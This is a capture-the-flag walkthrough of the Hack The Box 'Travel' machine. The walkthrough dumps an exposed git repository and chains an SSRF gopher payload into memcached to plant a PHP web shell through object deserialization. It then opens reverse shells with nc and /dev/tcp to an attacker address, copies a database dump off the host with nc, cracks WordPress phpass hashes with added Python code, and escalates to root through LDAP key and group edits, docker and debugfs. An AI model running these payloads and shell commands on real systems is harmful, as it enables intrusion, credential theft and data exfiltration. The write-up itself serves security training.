Travel

Nmap

nmap -sC -sV -p- -T5 -Pn 10.10.10.189        
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 17:54 BST
Nmap scan report for travel.htb (10.10.10.189)
Host is up, received user-set (0.10s latency).
Not shown: 65532 closed ports
Reason: 65532 resets
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     syn-ack ttl 62 nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB
443/tcp open  ssl/http syn-ack ttl 62 nginx 1.17.6
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB - SSL coming soon.
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Not valid before: 2020-04-23T19:24:29
|_Not valid after:  2030-04-21T19:24:29
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

USER

The certificate's SAN list shows additional hostnames that have to be added to /etc/hosts. Note also the TTL values: SSH answers with ttl 63 while the nginx ports answer with ttl 62, one hop further away, which suggests the web stack runs in a container on the host (the docker images found later confirm this).
blog.travel.htb
blog-dev.travel.htb

python3 /opt/dirsearch/dirsearch.py -u http://travel.htb -t 10 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -e txt,php,html


[18:03:52] Starting: 
[18:04:54] 301 -  170B  - /css  ->  http://travel.htb/css/
[18:05:36] 301 -  170B  - /img  ->  http://travel.htb/img/
[18:05:44] 301 -  170B  - /js  ->  http://travel.htb/js/
[18:05:50] 301 -  170B  - /lib  ->  http://travel.htb/lib/
[18:06:09] 301 -  170B  - /newsfeed  ->  http://travel.htb/newsfeed/
python3 /opt/dirsearch/dirsearch.py -u http://blog.travel.htb -t 10 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -e txt,php,html


Target: http://blog.travel.htb

[18:09:54] Starting: 
[18:09:55] 301 -    0B  - /%21  ->  http://blog.travel.htb/
[18:09:56] 301 -    0B  - /0  ->  http://blog.travel.htb/0/
[18:09:56] 301 -    0B  - /0000  ->  http://blog.travel.htb/0000/
[18:10:13] 301 -    0B  - /2020  ->  http://blog.travel.htb/2020/
[18:10:46] 301 -    0B  - /A  ->  http://blog.travel.htb/awesome-rss/
[18:10:49] 301 -    0B  - /H  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:11:24] 301 -    0B  - /a  ->  http://blog.travel.htb/awesome-rss/
[18:11:42] 302 -    0B  - /admin  ->  http://blog.travel.htb/wp-admin/
[18:12:34] 301 -    0B  - /asdfjkl%3B  ->  http://blog.travel.htb/asdfjkl
[18:12:45] 301 -    0B  - /atom  ->  http://blog.travel.htb/feed/atom/
[18:12:55] 301 -    0B  - /aw  ->  http://blog.travel.htb/awesome-rss/
[18:12:55] 301 -    0B  - /awesome  ->  http://blog.travel.htb/awesome-rss/
[18:15:58] 302 -    0B  - /dashboard  ->  http://blog.travel.htb/wp-admin/
[18:17:14] 301 -    0B  - /embed  ->  http://blog.travel.htb/embed/
[18:17:55] 302 -    0B  - /favicon.ico  ->  http://blog.travel.htb/wp-admin/images/w-logo-blue.png
[18:17:57] 301 -    0B  - /feed  ->  http://blog.travel.htb/feed/
[18:18:10] 301 -    0B  - /fixed%21  ->  http://blog.travel.htb/fixed
[18:19:25] 301 -    0B  - /h  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:31] 301 -    0B  - /he  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:34] 301 -    0B  - /hello-world  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:34] 301 -    0B  - /hell  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:19:34] 301 -    0B  - /hello  ->  http://blog.travel.htb/2020/04/13/hello-world/
[18:22:25] 302 -    0B  - /login  ->  http://blog.travel.htb/wp-login.php
[18:25:10] 301 -    0B  - /page1  ->  http://blog.travel.htb/
[18:27:07] 301 -    0B  - /rdf  ->  http://blog.travel.htb/feed/rdf/
[18:27:44] 200 -   67B  - /robots.txt
[18:27:52] 301 -    0B  - /rss  ->  http://blog.travel.htb/feed/
[18:27:52] 301 -    0B  - /rss2  ->  http://blog.travel.htb/feed/
[18:28:39] 403 -  280B  - /server-status
[18:31:19] 301 -    0B  - /transmissio%20%20  ->  http://blog.travel.htb/transmissio
[18:33:18] 301 -  321B  - /wp-admin  ->  http://blog.travel.htb/wp-admin/
[18:33:18] 301 -  323B  - /wp-content  ->  http://blog.travel.htb/wp-content/
[18:33:19] 301 -  324B  - /wp-includes  ->  http://blog.travel.htb/wp-includes/
[18:33:51] 301 -    0B  - /~a  ->  http://blog.travel.htb/awesome-rss/

It found a few things, but nothing that leads anywhere on its own. Digging further on the internet I came across an article about git projects and their directory structure:

https://medium.com/swlh/hacking-git-directories-e0e60fa79a36

After a bit of poking around you find

http://blog-dev.travel.htb/.git/HEAD

which by itself contains nothing interesting, but it confirms an exposed .git directory on the dev vhost.

To pull the repository down we use gitdumper from GitTools:

./gitdumper.sh http://blog-dev.travel.htb/.git/ ~/htb/travel/git

tree
.
├── COMMIT_EDITMSG
├── config
├── description
├── HEAD
├── index
├── info
│   └── exclude
├── logs
│   ├── HEAD
│   └── refs
│       ├── heads
│       │   └── master
│       └── remotes
│           └── origin
├── objects
│   ├── 00
│   ├── 03
│   │   └── 13850ae948d71767aff2cc8cc0f87a0feeef63
│   ├── 2b
│   │   └── 1869f5a2d50f0ede787af91b3ff376efb7b039
│   ├── 30
│   │   └── b6f36ec80e8bc96451e47c49597fdd64cee2da
│   ├── b0
│   │   └── 2b083f68102c4d62c49ed3c99ccbb31632ae9f
│   ├── ed
│   │   └── 116c7c7c51645f1e8a403bcec44873f74208e9
│   └── info
└── refs
    ├── heads
    │   └── master
    ├── remotes
    │   └── origin
    └── wip
        ├── index
        │   └── refs
        │       └── heads
        └── wtree
            └── refs
                └── heads

25 directories, 14 files
.git/logs/HEAD

0000000000000000000000000000000000000000 0313850ae948d71767aff2cc8cc0f87a0feeef63 jane <jane@travel.htb> 1587458094 -0700    commit (initial): moved to git
git cat-file -p master
tree b02b083f68102c4d62c49ed3c99ccbb31632ae9f
author jane <jane@travel.htb> 1587458094 -0700
committer jane <jane@travel.htb> 1587458094 -0700
git cat-file -p b02b083f68102c4d62c49ed3c99ccbb31632ae9f
100755 blob ed116c7c7c51645f1e8a403bcec44873f74208e9	README.md
100755 blob 2b1869f5a2d50f0ede787af91b3ff376efb7b039	rss_template.php
100755 blob 30b6f36ec80e8bc96451e47c49597fdd64cee2da	template.php
git cat-file -p ed116c7c7c51645f1e8a403bcec44873f74208e9
# Rss Template Extension

Allows rss-feeds to be shown on a custom wordpress page.

## Setup

* `git clone https://github.com/WordPress/WordPress.git`
* copy rss_template.php & template.php to `wp-content/themes/twentytwenty` 
* create logs directory in `wp-content/themes/twentytwenty` 
* create page in backend and choose rss_template.php as theme

## Changelog

- temporarily disabled cache compression
- added additional security checks 
- added caching
- added rss template

## ToDo

- finish logging implementation#    
git cat-file -p 2b1869f5a2d50f0ede787af91b3ff376efb7b039
<?php
/*
Template Name: Awesome RSS
*/
include('template.php');
get_header();
?>

<main class="section-inner">
	<?php
	function get_feed($url){
     require_once ABSPATH . '/wp-includes/class-simplepie.php';	    
     $simplepie = null;	  
     $data = url_get_contents($url);
     if ($url) {
         $simplepie = new SimplePie();
         $simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');
         //$simplepie->set_raw_data($data);
         $simplepie->set_feed_url($url);
         $simplepie->init();
         $simplepie->handle_content_type();
         if ($simplepie->error) {
             error_log($simplepie->error);
             $simplepie = null;
             $failed = True;
         }
     } else {
         $failed = True;
     }
     return $simplepie;
 	 }

 	$url = $_SERVER['QUERY_STRING'];
	if(strpos($url, "custom_feed_url") !== false){
		$tmp = (explode("=", $url)); 	
		$url = end($tmp); 	
 	 } else {
 	 	$url = "http://www.travel.htb/newsfeed/customfeed.xml";
 	 }
 	 $feed = get_feed($url); 
     if ($feed->error())
		{
			echo '<div class="sp_errors">' . "\r\n";
			echo '<p>' . htmlspecialchars($feed->error()) . "</p>\r\n";
			echo '</div>' . "\r\n";
		}
		else {
	?>
	<div class="chunk focus">
		<h3 class="header">
		<?php 
			$link = $feed->get_link();
			$title = $feed->get_title();
			if ($link) 
			{ 
				$title = "<a href='$link' title='$title'>$title</a>"; 
			}
			echo $title;
		?>
		</h3>
		<?php echo $feed->get_description(); ?>

	</div>
	<?php foreach($feed->get_items() as $item): ?>
		<div class="chunk">
			<h4><?php if ($item->get_permalink()) echo '<a href="' . $item->get_permalink() . '">'; echo $item->get_title(); if ($item->get_permalink()) echo '</a>'; ?> <span class="footnote"><?php echo $item->get_date('j M Y, g:i a'); ?></span></h4>
			<?php echo $item->get_content(); ?>
			<?php
			if ($enclosure = $item->get_enclosure(0))
			{
				echo '<div align="center">';
				echo '<p>' . $enclosure->embed(array(
					'audio' => './for_the_demo/place_audio.png',
					'video' => './for_the_demo/place_video.png',
					'mediaplayer' => './for_the_demo/mediaplayer.swf',
					'altclass' => 'download'
				)) . '</p>';
				if ($enclosure->get_link() && $enclosure->get_type())
				{
					echo '<p class="footnote" align="center">(' . $enclosure->get_type();
					if ($enclosure->get_size())
					{
						echo '; ' . $enclosure->get_size() . ' MB';
					}
					echo ')</p>';
				}
				if ($enclosure->get_thumbnail())
				{
					echo '<div><img src="' . $enclosure->get_thumbnail() . '" alt="" /></div>';
				}
				echo '</div>';
			}
			?>

		</div>
	<?php endforeach; ?>
<?php } ?>
</main>

<!--
DEBUG
<?php
if (isset($_GET['debug'])){
  include('debug.php');
}
?>
-->

<?php get_template_part( 'template-parts/footer-menus-widgets' ); ?>

<?php
get_footer();
git cat-file -p 30b6f36ec80e8bc96451e47c49597fdd64cee2da
<?php

/**
 Todo: finish logging implementation via TemplateHelper
*/

function safe($url)
{
	// this should be secure
	$tmpUrl = urldecode($url);
	if(strpos($tmpUrl, "file://") !== false or strpos($tmpUrl, "@") !== false)
	{		
		die("<h2>Hacking attempt prevented (LFI). Event has been logged.</h2>");
	}
	if(strpos($tmpUrl, "-o") !== false or strpos($tmpUrl, "-F") !== false)
	{		
		die("<h2>Hacking attempt prevented (Command Injection). Event has been logged.</h2>");
	}
	$tmp = parse_url($url, PHP_URL_HOST);
	// preventing all localhost access
	if($tmp == "localhost" or $tmp == "127.0.0.1")
	{		
		die("<h2>Hacking attempt prevented (Internal SSRF). Event has been logged.</h2>");		
	}
	return $url;
}

function url_get_contents ($url) {
    $url = safe($url);
	$url = escapeshellarg($url);
	$pl = "curl ".$url;
	$output = shell_exec($pl);
    return $output;
}


class TemplateHelper
{

    private $file;
    private $data;

    public function __construct(string $file, string $data)
    {
    	$this->init($file, $data);
    }

    public function __wakeup()
    {
    	$this->init($this->file, $this->data);
    }

    private function init(string $file, string $data)
    {    	
        $this->file = $file;
        $this->data = $data;
        file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
    }
}

Analysis of the PHP code shows how the memcached key is built: SimplePie's Memcached cache class prepends the configured prefix to an md5 hash

Memcached.php

$this->name = $this->options['extras']['prefix'] . md5("$name:$type");

You generate that "hash", then use the SSRF (the feed URL is handed straight to curl) to send a gopher:// request to memcached that stores a serialized TemplateHelper object under that key. The 127.0.0.1 check in safe() is a plain string comparison on the parsed host, so it is bypassed by writing the loopback address in a different notation, e.g. the octal form 0177.0.0.01. When SimplePie later reads the cache entry and unserializes it, __wakeup() calls init(), which writes $data into logs/$file, i.e. a PHP web shell inside the theme directory:

http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://0177.0.0.01:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20138%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22%00TemplateHelper%00file%22%3Bs:8:%22revs.php%22%3Bs:20:%22%00TemplateHelper%00data%22%3Bs:33:%22%3C%3Fphp%20echo%20system%28%24_GET%5B%22c%22%5D%29%3B%20%3F%3E%22%3B%7D%0d%0a

You can check what was stored by viewing the debug page:

http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php

xct_4e5612ba079c(...) | a:4:{s:5:"child";a:1:{s:0:"";a:1:{(...) 

To trigger the deserialization, request the feed page again (it now reads the poisoned cache entry):

http://blog.travel.htb/awesome-rss/

Next, use the uploaded file to launch a reverse shell:

http://blog.travel.htb/wp-content/themes/twentytwenty/logs/revs.php?c=nc%20-e%20/bin/bash%20[IP]%20[PORT]
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

To get a better shell, start a listener on the attacking machine

rlwrap nc -lvp [PORT]

and from the web shell spawn a bash reverse shell into it:

export SHELL=bash
bash -i >& /dev/tcp/[IP]/[PORT] 0>&1

Browsing the filesystem, the WordPress configuration file holds the database credentials:

www-data@blog:/var/www/html$ cat wp-config.php

...
define( 'DB_NAME', 'wp' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' );
...

In /opt there is a database backup that needs to be pulled back to the attacking machine

www-data@blog:/opt/wordpress$ ls

backup-13-04-2020.sql

On the attacking machine, listen for the file:

nc -l -p [PORT] > baza.sql

On the target, send it:

nc -w 3 [IP] [PORT]  < backup-13-04-2020.sql

Then load the dump into a local MariaDB instance and inspect it:

systemctl start mysql
mysql -e "source baza.sql"  -p
fiFtDDV9LYe8Ti
mysql
show DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wp                 |
+--------------------+


MariaDB [(none)]> use wp;
MariaDB [wp]> show tables;
+-----------------------+
| Tables_in_wp          |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
MariaDB [wp]> select * from wp_users;

+----+-------------+------------------------------------+---------------+------------------+------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login  | user_pass                          | user_nicename | user_email       | user_url         | user_registered     | user_activation_key | user_status | display_name  |
+----+-------------+------------------------------------+---------------+------------------+------------------+---------------------+---------------------+-------------+---------------+
|  1 | admin       | $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/ | admin         | admin@travel.htb | http://localhost | 2020-04-13 13:19:01 |                     |           0 | admin         |
|  2 | lynik-admin | $P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc. | lynik-admin   | lynik@travel.htb |                  | 2020-04-13 13:36:18 |                     |           0 | Lynik Schmidt |
+----+-------------+------------------------------------+---------------+------------------+------------------+---------------------+---------------------+-------------+---------------+

Next crack the hash with hashcat, mode 400 (phpass, the portable MD5-based format WordPress uses for its $P$ hashes):

hashcat --force -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt

...
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
...

lynik-admin : 1stepcloser
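Hashcat is the practical tool, but the $P$ format is worth understanding so you can verify a cracked password yourself or spot a malformed hash. The following is an added example (not the page's own code) that reimplements phpass's portable hash in pure Python: parse the iteration count and salt, run the MD5 chain, compare with the stored value, and wrap it in a small wordlist loop. The hash constant is copied from the wp_users dump above; the algorithm follows phpass's crypt_private() and encode64() as shipped in WordPress's class-phpass.php, and the mini wordlist in the main block is constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

# phpass alphabet: the character after "$P$" encodes log2 of the MD5 round count,
# and the 8-character salt plus the 22-character digest use the same alphabet.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash of lynik-admin copied from the wp_users dump on this page.
WP_HASH = "$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc."


def _encode64(raw: bytes, count: int) -> str:
    """phpass's own base64: 3 bytes -> 4 chars, low 6 bits first, no padding."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _parse(setting: str) -> Tuple[int, str]:
    """Return (rounds, salt) from the 12-character '$P$<log2><salt8>' prefix."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count outside phpass limits")
    return 1 << count_log2, setting[4:12]


def phpass_rounds(stored: str) -> int:
    return _parse(stored)[0]


def phpass_salt(stored: str) -> str:
    return _parse(stored)[1]


def phpass_crypt(password: str, setting: str) -> str:
    """crypt_private(): h = md5(salt || pw), then `rounds` times h = md5(h || pw)."""
    rounds, salt = _parse(setting)
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(rounds):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_verify(password: str, stored: str) -> bool:
    if len(stored) != 34:
        return False
    return hmac.compare_digest(phpass_crypt(password, stored), stored)


def phpass_hash(password: str, count_log2: int = 13, salt: Optional[str] = None) -> str:
    """Create a fresh hash; count_log2=13 ('B') is what WordPress produced on this box."""
    if salt is None:
        salt = _encode64(os.urandom(6), 6)
    return phpass_crypt(password, "$P$" + ITOA64[count_log2] + salt)


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate that verifies, else None."""
    for pw in candidates:
        if phpass_verify(pw, stored):
            return pw
    return None


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt.
    print(crack(WP_HASH, ["password", "admin", "travel", "1stepcloser"]))
```

The 'B' after $P$ is position 13 in the alphabet, so each guess costs 2^13 = 8192 chained MD5 calls plus one; that is cheap enough that a GPU chews through rockyou in seconds, which is the reason WordPress installs on modern PHP should be on bcrypt or Argon2 instead. The next 8 characters are the salt and the final 22 are the phpass base64 of the 16-byte digest.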

With that password we can log in as the user over SSH:

ssh lynik-admin@travel.htb
cat user.txt
8f95fe7a617***c40c33d634f3

ROOT

Enumeration shows that the host uses an LDAP server (ldap.travel.htb), and the bind password for lynik-admin has been left behind in the vim register history:

lynik-admin@travel:~$ cat .viminfo
...
# Registers:
""1	LINE	0
	BINDPW Theroadlesstraveled
|3,1,1,1,1,0,1587670528,"BINDPW Theroadlesstraveled"
...
lynik-admin@travel:~$ cat .ldaprc 

HOST ldap.travel.htb
BASE dc=travel,dc=htb
BINDDN cn=lynik-admin,dc=travel,dc=htb

With those credentials you can, for example, enumerate the LDAP users (only the uid values are shown here):

ldapsearch -x -LLL uid=* -H ldap://ldap.travel.htb -D 'cn=lynik-admin,dc=travel,dc=htb' -w Theroadlesstraveled

 jane
 brian
 frank
 jerry
 lynik
 edward
 eugene
 gloria
 johnny
 louise
 christopher

Further enumeration shows that, bound as lynik-admin, you can add keys to the user brian, and a web search turns up Oracle's instructions on how to modify users and authenticate them over SSH with public keys stored in LDAP

-->INSTRUCTIONS<--

From here there are many paths to a solution; I will show only two, but there are more. It is worth practising on what privileges the "unused" users have
-->READ<--

Namely, as in the instructions, we create LDIF files. The first adds an SSH public key (and the ldapPublicKey object class it needs) to the user brian so that we can log in as him; the second changes the user's uid/gid so that the session lands in a privileged group.

plik1.ldif

dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: [SSH PUBLIC KEY]
ldapmodify -a -x -D "cn=lynik-admin,dc=travel,dc=htb" -w "Theroadlesstraveled" -H ldap://ldap.travel.htb -f plik1.ldif

FIRST: add the docker group (117):

plik2.ldif

dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: uidNumber
uidNumber: 1000
-
replace: gidNumber
gidNumber: 117
ldapmodify -a -x -D "cn=lynik-admin,dc=travel,dc=htb" -w "Theroadlesstraveled" -H ldap://ldap.travel.htb -f plik2.ldif

After logging in as brian over SSH, the session runs with uid 1000, which the host maps to the local user trvl-admin, and with docker (117) as the primary group:

ssh brian@travel.htb

trvl-admin@travel:~$ id -a
uid=1000(trvl-admin) gid=117(docker) groups=117(docker),5000(domainusers)
docker image ls

REPOSITORY            TAG                 IMAGE ID            CREATED             SIZE
nginx                 latest              602e111c06b6        3 weeks ago         127MB
memcached             latest              ac4488374c89        3 weeks ago         82.3MB
blog                  latest              4225bf7c5157        5 weeks ago         981MB
ubuntu                18.04               4e5021d210f6        8 weeks ago         64.2MB
jwilder/nginx-proxy   alpine              a7a1c0b44c8a        3 months ago        54.6MB
osixia/openldap       latest              4c780dfa5f5e        7 months ago        275MB

We use the Ubuntu image and mount the host's /root into the container:

trvl-admin@travel:~$ docker run -v /root/:/mnt -it 4e5021d210f6

root@0d44b7f4ba64:/# cd /mnt
root@0d44b7f4ba64:/mnt# ls
bin  root.txt  snap
root@0d44b7f4ba64:/mnt# cat root.txt
63af32019600e****6b2a619c39bc

SECOND: add the disk group (6), which gives raw read access to the block device:

plik2.ldif

dn: uid=brian,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changeType: modify
replace: uidNumber
uidNumber: 1000
-
replace: gidNumber
gidNumber: 6
ldapmodify -a -x -D "cn=lynik-admin,dc=travel,dc=htb" -w "Theroadlesstraveled" -H ldap://ldap.travel.htb -f plik2.ldif

After logging in as brian over SSH, we are again uid 1000 (trvl-admin), this time with disk (6) as the primary group, so the root filesystem can be read straight off the device with debugfs:

ssh brian@travel.htb

trvl-admin@travel:~$ id
uid=1000(trvl-admin) gid=6(disk) groups=6(disk),5000(domainusers)
trvl-admin@travel:~$ debugfs /dev/sda2
debugfs 1.45.5 (07-Jan-2020)

debugfs:  cat /root/root.txt
63af320196****2c6b2a619c39bc
